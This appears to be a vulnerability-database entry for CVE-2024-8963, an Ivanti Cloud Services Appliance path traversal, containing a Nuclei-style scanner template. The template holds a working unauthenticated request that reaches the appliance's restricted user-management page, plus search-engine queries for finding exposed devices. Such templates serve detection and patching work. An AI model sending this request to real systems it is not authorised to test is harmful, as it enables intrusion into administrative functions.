CVE-2024-8963: Ivanti Cloud Services Appliance - Path Traversal

日期: 2025-08-01 | 影响软件: Ivanti Cloud Services Appliance | POC: 已公开

漏洞描述

Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality.

PoC代码[已公开]

id: CVE-2024-8963

info:
  name: Ivanti Cloud Services Appliance - Path Traversal
  author: johnk3r
  severity: critical
  description: |
    Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality.
  reference:
    - https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa
    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8963
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-8963
    cwe-id: CWE-22
    epss-score: 0.94225
    epss-percentile: 0.99919
    cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:4.6:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ivanti
    product: endpoint_manager_cloud_services_appliance
    shodan-query:
      - http.title:"cloud services appliance"
      - http.title:"landesk(r) cloud services appliance"
    fofa-query: title="landesk(r) cloud services appliance"
    google-query: intitle:"landesk(r) cloud services appliance"
  tags: cve,cve2024,ivanti,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/client/index.php%3F.php/gsb/users.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Ivanti Cloud Services Appliance"
          - "User name"
          - "Set Password"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022077cbe13c7f3bf53592f59d6b9b438f74c75350e72e91acb4c6c83bfc27b5ba820221008e0f5a2970f1594ab349ffa6a77f66aec2e5bf1803b37a626ac1d1aaec973bfa:922c64590222798bb761d5b6d8e72950

相关漏洞推荐